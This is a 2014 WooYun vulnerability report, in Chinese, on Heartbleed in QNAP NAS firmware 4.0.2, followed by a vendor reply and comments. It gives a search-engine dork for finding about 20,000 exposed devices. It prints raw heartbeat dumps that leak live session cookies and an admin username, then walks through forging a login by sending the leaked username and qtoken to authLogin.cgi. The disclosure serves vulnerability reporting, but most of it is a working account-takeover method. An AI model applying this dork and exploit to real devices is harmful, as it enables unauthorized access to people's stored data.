当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067896

漏洞标题:某知名nas设备存在heartbleed(附利用技巧)

相关厂商:CNCERT

漏洞作者: if、so

提交时间:2014-07-09 16:04

修复时间:2014-10-07 16:06

公开时间:2014-10-07 16:06

漏洞类型:默认配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-09: 细节已通知厂商并且等待厂商处理中
2014-07-14: 厂商已经确认,细节仅向厂商公开
2014-07-17: 细节向第三方安全合作伙伴开放
2014-09-07: 细节向核心白帽子及相关领域专家公开
2014-09-17: 细节向普通白帽子公开
2014-09-27: 细节向实习白帽子公开
2014-10-07: 细节向公众公开

简要描述:

某知名nas设备存在heartbleed,附利用技巧

详细说明:

威联通科技股份有限公司(QNAP Systems, Inc.),是极少数以商用服务器获得世界认同的台湾跨国企业,旗下的NAS产品线在欧美市场的销售量已经居于领导性地位,成为华人于欧美市场成功开创自有品牌的典范。公司专注于提供专业级的NAS网络储存装置、NVR安全监控解决方案及NMP网络多媒体播放器。
旗下的QNAP NAS turbo 4.0.2版本存在heartbleed,(只知道这个版本)
Google hack:

inurl:inurl:cgi-bin/QTS.cgi?count=


搜索出来了2w多结果

1111.JPG


从第一个开始测试

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1208
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 0D 0A 44 7B ....#.........D{
00e0: EF 2F C7 08 29 7B 47 32 40 89 CF 03 9F 56 4C CC ./..){G2@....VL.
00f0: 6D 4D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D mM..............
0100: 01 00 02 00 03 00 0F 00 10 00 11 00 23 00 00 00 ............#...


Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1208
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2C CD 2E 7B ....#.......,..{
00e0: EB 35 1F AD A9 F5 15 B5 33 5F A9 9E 14 6E C5 A4 .5......3_...n..
00f0: F0 73 55 0C E8 E6 9A 6E A2 A1 D3 13 83 1F 11 73 .sU....n.......s
0100: 4D 05 FD 51 6A 1E 41 67 65 6E 74 3A 20 4D 6F 7A M..Qj.Agent: Moz
0110: 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74 illa/5.0 (compat
0120: 69 62 6C 65 3B 20 47 6F 6F 67 6C 65 62 6F 74 2F ible; Googlebot/
0130: 32 2E 31 3B 20 2B 68 74 74 70 3A 2F 2F 77 77 77 2.1; +http://www
0140: 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 62 6F 74 2E .google.com/bot.
0150: 68 74 6D 6C 29 0D 0A 0D 0A 06 AE F6 5B BD 4B E8 html).......[.K.
0160: 26 A2 3A 47 10 1F A3 E6 10 2A 9D 51 0C 74 2E 68 &.:G.....*.Q.t.h
0170: 74 6D 6C 29 0D 0A 0D 0A BE CD EE 1B 91 85 9D 77 tml)...........w
0180: 9E 76 98 5C C9 FE 16 0A 33 C3 AF 2A 00 00 00 00 .v.\....3..*....


... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1208
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 4D B3 0E 3C ....#.......M..<
00e0: AE 89 EE 2A 87 46 76 2B BB 75 3C 29 94 53 EA 95 ...*.Fv+.u<).S..
00f0: BB 45 5C E3 15 FB F9 42 2B 97 33 C8 BB 1C B0 5D .E\....B+.3....]
0100: 95 D7 0A 15 5F FB 43 6F 6E 6E 65 63 74 69 6F 6E ...._.Connection
0110: 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 0D 0A : keep-alive....
0120: 55 BF AC D3 9E 14 10 FB D7 0F 19 F6 64 B4 15 B6 U...........d...
0130: 8F AC 23 9E 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ..#.............
0140: 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 t: Mozilla/5.0 (
0150: 63 6F 6D 70 61 74 69 62 6C 65 3B 20 47 6F 6F 67 compatible; Goog
0160: 6C 65 62 6F 74 2F 32 2E 31 3B 20 2B 68 74 74 70 lebot/2.1; +http
0170: 3A 2F 2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F ://www.google.co
0180: 6D 2F 62 6F 74 2E 68 74 6D 6C 29 0D 0A 41 63 63 m/bot.html)..Acc
0190: 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 7A ept-Encoding: gz
01a0: 69 70 2C 64 65 66 6C 61 74 65 0D 0A 0D 0A 26 72 ip,deflate....&r
01b0: 3D 30 2E 32 38 36 36 34 32 39 32 34 34 31 36 38 =0.2866429244168
01c0: 31 30 33 F1 BD 91 9B 20 BD 71 05 89 21 2C D5 61 103.... .q..!,.a


Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1208
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 32 30 31 33 ....#.......2013
00e0: 30 37 32 36 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 0726..Accept-Lan
00f0: 67 75 61 67 65 3A 20 7A 68 2D 54 57 0D 0A 41 63 guage: zh-TW..Ac
0100: 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 67 cept-Encoding: g
0110: 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D 0A 55 73 zip, deflate..Us
0120: 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C er-Agent: Mozill
0130: 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C a/4.0 (compatibl
0140: 65 3B 20 4D 53 49 45 20 37 2E 30 3B 20 57 69 6E e; MSIE 7.0; Win
0150: 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 dows NT 6.1; WOW
0160: 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 64; Trident/7.0;
0170: 20 53 4C 43 43 32 3B 20 2E 4E 45 54 20 43 4C 52 SLCC2; .NET CLR
0180: 20 32 2E 30 2E 35 30 37 32 37 3B 20 2E 4E 45 54 2.0.50727; .NET
0190: 20 43 4C 52 20 33 2E 35 2E 33 30 37 32 39 3B 20 CLR 3.5.30729;
01a0: 2E 4E 45 54 20 43 4C 52 20 33 2E 30 2E 33 30 37 .NET CLR 3.0.307
01b0: 32 39 3B 20 4D 65 64 69 61 20 43 65 6E 74 65 72 29; Media Center
01c0: 20 50 43 20 36 2E 30 3B 20 2E 4E 45 54 34 2E 30 PC 6.0; .NET4.0
01d0: 43 3B 20 49 6E 66 6F 50 61 74 68 2E 33 3B 20 2E C; InfoPath.3; .
01e0: 4E 45 54 20 43 4C 52 20 31 2E 31 2E 34 33 32 32 NET CLR 1.1.4322
01f0: 3B 20 2E 4E 45 54 34 2E 30 45 29 0D 0A 48 6F 73 ; .NET4.0E)..Hos
0200: 74 3A 20 6E 61 73 2D 66 74 70 0D 0A 43 6F 6E 74 t: nas-ftp..Cont
0210: 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 36 30 0D 0A ent-Length: 60..
0220: 44 4E 54 3A 20 31 0D 0A 43 6F 6E 6E 65 63 74 69 DNT: 1..Connecti
0230: 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep-Alive..
0240: 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E Cache-Control: n
0250: 6F 2D 63 61 63 68 65 0D 0A 43 6F 6F 6B 69 65 3A o-cache..Cookie:
0260: 20 44 45 53 4B 54 4F 50 3D 31 3B 20 6E 61 73 5F DESKTOP=1; nas_
0270: 77 66 6D 5F 74 72 65 65 5F 78 3D 32 30 30 3B 20 wfm_tree_x=200;
0280: 6E 61 73 5F 32 5F 73 3D 6A 33 34 37 62 76 69 32 nas_2_s=j347bvi2
0290: 3B 20 57 49 4E 44 4F 57 5F 4D 4F 44 45 3D 31 3B ; WINDOW_MODE=1;
02a0: 20 6E 61 73 5F 6C 61 6E 67 3D 45 4E 47 3B 20 73 nas_lang=ENG; s
02b0: 6B 69 70 5F 49 45 5F 64 65 74 65 63 74 3D 31 3B kip_IE_detect=1;
02c0: 20 50 48 50 53 45 53 53 49 44 3D 37 38 36 35 63 PHPSESSID=7865c
02d0: 65 63 66 39 65 63 63 37 39 63 36 39 66 32 39 30 ecf9ecc79c69f290
02e0: 30 30 63 65 33 35 38 66 34 33 33 3B 20 4E 41 53 00ce358f433; NAS
02f0: 5F 55 53 45 52 3D 61 64 6D 69 6E 3B 20 68 6F 6D _USER=admin; hom
0300: 65 3D 31 3B 20 4E 41 53 5F 53 49 44 3D 6A 33 34 e=1; NAS_SID=j34
0310: 37 62 76 69 32 3B 20 73 68 6F 77 51 75 69 63 6B 7bvi2; showQuick
0320: 53 74 61 72 74 3D 31 3B 20 51 54 3D 31 34 30 34 Start=1; QT=1404
0330: 38 38 31 37 34 31 38 33 30 0D 0A 0D 0A C9 5F 06 881741830....._.
0340: 2B FB 50 B6 9F B8 A6 1B C2 48 D0 AC 35 8F C8 1F +.P......H..5...
0350: F8 B0 9E F6 D4 55 0D 0B 03 17 31 96 7D 02 02 02 .....U....1.}...


第一页随便就测出了5,6个,至于其他没测试出,说明防火墙屏蔽了443端口,毕竟有些机器是内网映射出来的。
利用:现成的cookie是无法登入的,利用花了好多时间才搞定。

1111.JPG


当多尝试几次抓取到cookie数据时,这里指的完整数据,是带有token的,这是关键,然后找到nas_1_u,后面是base64编码,解出来就是用户名,有时候会直接有nas_user参数,我这个cookie里面没有。当知道用户名和token就可以伪造正常登陆nas系统了。

_2014-07-09T07-35-25.562Z.png


首先随便输入信息,抓个包

POST /cgi-bin/authLogin.cgi HTTP/1.1
Host: xxx:8080
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxx/cgi-bin/login.html?4.0.3.20130912
Content-Length: 52
Cookie: DESKTOP=1; PHPSESSID=6ce5874ada5f49475b4d3363e1009b7d
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
user=123&serviceKey=1&pwd=MTIz&&r=0.6503833241116638


然后替换用户名,并且加上token

user=Mediaxxx&serviceKey=1&remme=1&qtoken=8e0398b48e33b12d2431a2994b25161d


然后burp一直forward,然后就登陆进去了

_2014-07-09T07-41-50.023Z.png

漏洞证明:

_2014-07-09T07-41-50.023Z.png

修复方案:

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-07-14 10:28

厂商回复:

在此前的Openssl漏洞中,CNVD已经完成测试。参见此前的CNVD微博公告。同时感谢白帽子的特征提取工作,CNVD已经收录该特征。目前,由于未直接建立软件生产厂商联系渠道,待进一步处置。按通用软件衍生漏洞评分,ran k12

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-09 17:45 | 从容 ( 普通白帽子 | Rank:221 漏洞数:75 | Enjoy Hacking Just Because It's Fun :) ...)

    关注下,我是冲着猥琐的利用技巧来的

  2. 2014-07-10 01:07 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @cncert 4.0.3好像也存在,不过关键字不知道怎么提取